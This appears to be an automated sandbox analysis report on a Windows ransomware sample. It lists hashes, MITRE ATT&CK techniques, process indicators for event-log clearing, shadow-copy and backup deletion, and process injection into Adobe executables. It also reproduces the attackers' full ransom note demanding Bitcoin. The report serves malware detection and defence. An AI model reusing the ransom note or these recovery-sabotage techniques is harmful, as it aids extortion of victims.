e9b99706a9b48b09974dd18c1af8a0e402ccddcaa0c91edf43fdd838128a7408

Analysis

max time kernel
147s
max time network
125s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
22-11-2024 02:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
Size

727KB
MD5

d13f890034a68ccb4af4e0bf51e2b5ec
SHA1

84afde24c913c007b0c0490041b61877aa254737
SHA256

08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4
SHA512

0065844527f3a3556bc50705f9d5608561a04e95a2d99b1a262db1094ca188425ef69f02f801eab2eaf74e14e027ceebb471a754192e195e51b6c57d3d7d45ce
SSDEEP

12288:jk2624GHVUBOSRVrHZfiZHJ2HFO/9xwrPgWyzZp+L7vN3:H6+VUBraeF8/tSh

Score

10^/10

credential_access defense_evasion discovery evasion execution impact persistence ransomware stealer

Malware Config

Extracted

Path

C:\FILES.TXT

Ransom Note

Don't panic, read this and contact someone from IT department. Your computer has been infected with a virus known as ransomware. All files including your personal or business documents, backups and projects are encrypted. Encryption is very sophisticated and without paying a ransom you won't get your files back. You could be advised not to pay, but you should anyway get in touch with us. Ransom value for your files is 5000$ to be paid in digital currency called Bitcoin. If you have questions, write us. If you have doubts, write us. If you want to negotiate, write us. If you want to make sure we can get your files back, write us. [email protected] [email protected] [email protected] In case we don't respond to an email within one day, download application called BitMessage and reach to us for the fastest response. BitMessage BM-2cVPKqFb5ZRaMuYdryqxsMNxFMudibvnY6 ######################################################################### To someone from IT department This is custom developed ransomware, decrypter won't be made by an antivirus company. This one doesn't even have a name. It uses AES-256 for encrypting files, RSA-2048 for storing encrypted AES-256 password and SHA-2 for keeping the encrypted file integrity. It's written in C++ and have passed many quality assurance tests. To prevent this next time use offline backups. #########################################################################

Emails

[email protected]

Signatures

Clears Windows event logs 1 TTPs 8 IoCs
evasion ransomware

Clear Windows Event Logs
T1070.001

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid process

8668 wevtutil.exe
1396 wevtutil.exe
1148 wevtutil.exe
2052 wevtutil.exe
2388 wevtutil.exe
5596 wevtutil.exe
6616 wevtutil.exe
15584 wevtutil.exe
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid process

3052 bcdedit.exe
3056 bcdedit.exe
4468 bcdedit.exe
4548 bcdedit.exe
Deletes backup catalog 3 TTPs 2 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exewbadmin.exe

pid process

1048 wbadmin.exe
4672 wbadmin.exe
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

pid	process
8668	wevtutil.exe
1396	wevtutil.exe
1148	wevtutil.exe
2052	wevtutil.exe
2388	wevtutil.exe
5596	wevtutil.exe
6616	wevtutil.exe
15584	wevtutil.exe

pid	process
3052	bcdedit.exe
3056	bcdedit.exe
4468	bcdedit.exe
4548	bcdedit.exe

pid	process
1048	wbadmin.exe
4672	wbadmin.exe

Drops startup file 4 IoCs

Processes:

A3DUtility.exeAcroBroker.exeAcroRd32.exeAdobeCollabSync.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\FILES.TXT	A3DUtility.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\FILES.TXT	AcroBroker.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\FILES.TXT	AcroRd32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\FILES.TXT	AdobeCollabSync.exe

Executes dropped EXE 1 IoCs

Processes:

AcroRd32Info.exe

pid process

12708 AcroRd32Info.exe

pid	process
12708	AcroRd32Info.exe

Loads dropped DLL 60 IoCs

Processes:

AcroBroker.exeAdobeCollabSync.exeAcroRd32.exeA3DUtility.exe

pid	process
2884	AcroBroker.exe
2884	AcroBroker.exe
2092	AdobeCollabSync.exe
2092	AdobeCollabSync.exe
15668	AcroRd32.exe
15668	AcroRd32.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
15668	AcroRd32.exe
15668	AcroRd32.exe
15668	AcroRd32.exe
15668	AcroRd32.exe
15668	AcroRd32.exe
15668	AcroRd32.exe
15668	AcroRd32.exe
15668	AcroRd32.exe
2092	AdobeCollabSync.exe
2092	AdobeCollabSync.exe
2092	AdobeCollabSync.exe
2092	AdobeCollabSync.exe
2092	AdobeCollabSync.exe
2092	AdobeCollabSync.exe
2092	AdobeCollabSync.exe
2092	AdobeCollabSync.exe
2884	AcroBroker.exe
2884	AcroBroker.exe
2884	AcroBroker.exe
2884	AcroBroker.exe
2884	AcroBroker.exe
2884	AcroBroker.exe
2884	AcroBroker.exe
2884	AcroBroker.exe
2884	AcroBroker.exe
2884	AcroBroker.exe
2884	AcroBroker.exe
2884	AcroBroker.exe
15668	AcroRd32.exe
15668	AcroRd32.exe
15668	AcroRd32.exe
15668	AcroRd32.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2092	AdobeCollabSync.exe
2092	AdobeCollabSync.exe
2092	AdobeCollabSync.exe
2092	AdobeCollabSync.exe
2092	AdobeCollabSync.exe
2092	AdobeCollabSync.exe
2092	AdobeCollabSync.exe
2092	AdobeCollabSync.exe

Drops desktop.ini file(s) 48 IoCs

Processes:

A3DUtility.exeAcroBroker.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	A3DUtility.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	A3DUtility.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	A3DUtility.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	A3DUtility.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-1488793075-819845221-1497111674-1000\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	A3DUtility.exe
File opened for modification	C:\Program Files\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	A3DUtility.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini	A3DUtility.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\691RDNCS\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Public\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	A3DUtility.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CW1M20CU\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\I618Z2Y3\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	AcroBroker.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	A3DUtility.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-1488793075-819845221-1497111674-1000\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	A3DUtility.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	A3DUtility.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	A3DUtility.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	A3DUtility.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\C1JHBK4W\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	A3DUtility.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	A3DUtility.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	A3DUtility.exe

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

Processes:

powercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execmd.exepowercfg.exe

pid	process
1200	powercfg.exe
8944	cmd.exe
8288	powercfg.exe
6016	powercfg.exe
1928	powercfg.exe
1896	powercfg.exe
6100	powercfg.exe
12948	powercfg.exe
2156	cmd.exe
1404	powercfg.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe

description	pid	process	target process
PID 2860 set thread context of 2944	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	A3DUtility.exe
PID 2860 set thread context of 2884	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	AcroBroker.exe
PID 2860 set thread context of 15668	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	AcroRd32.exe
PID 2860 set thread context of 2092	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	AdobeCollabSync.exe

Drops file in Program Files directory 64 IoCs

Processes:

AcroBroker.exeA3DUtility.exeAcroRd32.exeAdobeCollabSync.exe08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Common Files\System\it-IT	AcroBroker.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\hu	A3DUtility.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue	A3DUtility.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\STUBBY2.WMF	A3DUtility.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar	A3DUtility.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR8F.GIF	A3DUtility.exe
File opened for modification	C:\Program Files\Java\jre7\bin\JdbcOdbc.dll	A3DUtility.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\FILES.TXT	AcroBroker.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar	A3DUtility.exe
File created	C:\Program Files (x86)\Common Files\Adobe\Updater6\FILES.TXT	AcroRd32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-14	A3DUtility.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\msdfmap.dll	AdobeCollabSync.exe
File opened for modification	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlceme35.dll	A3DUtility.exe
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.exe.sig	A3DUtility.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg	AcroBroker.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\ja\UIAutomationClientsideProviders.resources.dll	AcroRd32.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\System.IdentityModel.Selectors.dll	AcroRd32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd	AcroBroker.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
File opened for modification	C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
File created	C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\es-ES\FILES.TXT	A3DUtility.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGPUNCT.DPV	A3DUtility.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099203.GIF	A3DUtility.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\es\FILES.TXT	AcroBroker.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Angles.xml	A3DUtility.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\IPMS.ICO	A3DUtility.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui	AcroRd32.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.exe	AdobeCollabSync.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Oslo	A3DUtility.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105398.WMF	A3DUtility.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\New_York	A3DUtility.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ku_IQ\LC_MESSAGES	AcroBroker.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessData.dll	AcroRd32.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeLinguistic.dll	AdobeCollabSync.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\TextConv\fr-FR	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
File created	C:\Program Files\Java\FILES.TXT	AcroBroker.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\es-ES	AcroBroker.exe
File created	C:\Program Files\Microsoft Games\More Games\es-ES\FILES.TXT	AcroRd32.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui	AcroBroker.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\mainscroll.png	A3DUtility.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\TabTip32.exe	AdobeCollabSync.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\msdaremr.dll	AcroRd32.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE	A3DUtility.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE	A3DUtility.exe
File opened for modification	C:\Program Files\Java\jre7\bin\javaw.exe	A3DUtility.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-output2.jar	A3DUtility.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\TAB_ON.GIF	A3DUtility.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OneNoteSyncPC.dll	AcroRd32.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.JP.XML	AcroBroker.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.Xml.Linq.dll	AdobeCollabSync.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Help\en_US	AcroRd32.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDFFile_8.ico	AcroBroker.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303	AdobeCollabSync.exe
File created	C:\Program Files\Uninstall Information\FILES.TXT	AdobeCollabSync.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt	AcroBroker.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\images	A3DUtility.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\ja-JP	AcroBroker.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ku_IQ\LC_MESSAGES	AcroRd32.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Checkers\de-DE\ChkrRes.dll.mui	AcroBroker.exe
File opened for modification	C:\Program Files\Java\jre7\lib\applet	AdobeCollabSync.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\sd	AdobeCollabSync.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sw.txt	A3DUtility.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\FILES.TXT	AcroBroker.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\FILES.TXT	AcroBroker.exe

Drops file in Windows directory 4 IoCs

Processes:

A3DUtility.exeAcroBroker.exeAcroRd32.exeAdobeCollabSync.exe

description	ioc	process
File created	C:\Windows\FILES.TXT	A3DUtility.exe
File created	C:\Windows\FILES.TXT	AcroBroker.exe
File created	C:\Windows\FILES.TXT	AcroRd32.exe
File created	C:\Windows\FILES.TXT	AdobeCollabSync.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

A3DUtility.exeAcroBroker.exeAcroRd32.exeAdobeCollabSync.exe08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	A3DUtility.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AdobeCollabSync.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe

Interacts with shadow copies 3 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Direct Volume Access
T1006

Processes:

vssadmin.exevssadmin.exe

pid process

2032 vssadmin.exe
9228 vssadmin.exe

pid	process
2032	vssadmin.exe
9228	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exeA3DUtility.exe

pid	process
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2944	A3DUtility.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

vssvc.exeWMIC.exewbengine.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeWMIC.exe

description	pid	process
Token: SeBackupPrivilege	1784	vssvc.exe
Token: SeRestorePrivilege	1784	vssvc.exe
Token: SeAuditPrivilege	1784	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2624	WMIC.exe
Token: SeSecurityPrivilege	2624	WMIC.exe
Token: SeTakeOwnershipPrivilege	2624	WMIC.exe
Token: SeLoadDriverPrivilege	2624	WMIC.exe
Token: SeSystemProfilePrivilege	2624	WMIC.exe
Token: SeSystemtimePrivilege	2624	WMIC.exe
Token: SeProfSingleProcessPrivilege	2624	WMIC.exe
Token: SeIncBasePriorityPrivilege	2624	WMIC.exe
Token: SeCreatePagefilePrivilege	2624	WMIC.exe
Token: SeBackupPrivilege	2624	WMIC.exe
Token: SeRestorePrivilege	2624	WMIC.exe
Token: SeShutdownPrivilege	2624	WMIC.exe
Token: SeDebugPrivilege	2624	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2624	WMIC.exe
Token: SeRemoteShutdownPrivilege	2624	WMIC.exe
Token: SeUndockPrivilege	2624	WMIC.exe
Token: SeManageVolumePrivilege	2624	WMIC.exe
Token: 33	2624	WMIC.exe
Token: 34	2624	WMIC.exe
Token: 35	2624	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2624	WMIC.exe
Token: SeSecurityPrivilege	2624	WMIC.exe
Token: SeTakeOwnershipPrivilege	2624	WMIC.exe
Token: SeLoadDriverPrivilege	2624	WMIC.exe
Token: SeSystemProfilePrivilege	2624	WMIC.exe
Token: SeSystemtimePrivilege	2624	WMIC.exe
Token: SeProfSingleProcessPrivilege	2624	WMIC.exe
Token: SeIncBasePriorityPrivilege	2624	WMIC.exe
Token: SeCreatePagefilePrivilege	2624	WMIC.exe
Token: SeBackupPrivilege	2624	WMIC.exe
Token: SeRestorePrivilege	2624	WMIC.exe
Token: SeShutdownPrivilege	2624	WMIC.exe
Token: SeDebugPrivilege	2624	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2624	WMIC.exe
Token: SeRemoteShutdownPrivilege	2624	WMIC.exe
Token: SeUndockPrivilege	2624	WMIC.exe
Token: SeManageVolumePrivilege	2624	WMIC.exe
Token: 33	2624	WMIC.exe
Token: 34	2624	WMIC.exe
Token: 35	2624	WMIC.exe
Token: SeBackupPrivilege	1588	wbengine.exe
Token: SeRestorePrivilege	1588	wbengine.exe
Token: SeSecurityPrivilege	1588	wbengine.exe
Token: SeSecurityPrivilege	1396	wevtutil.exe
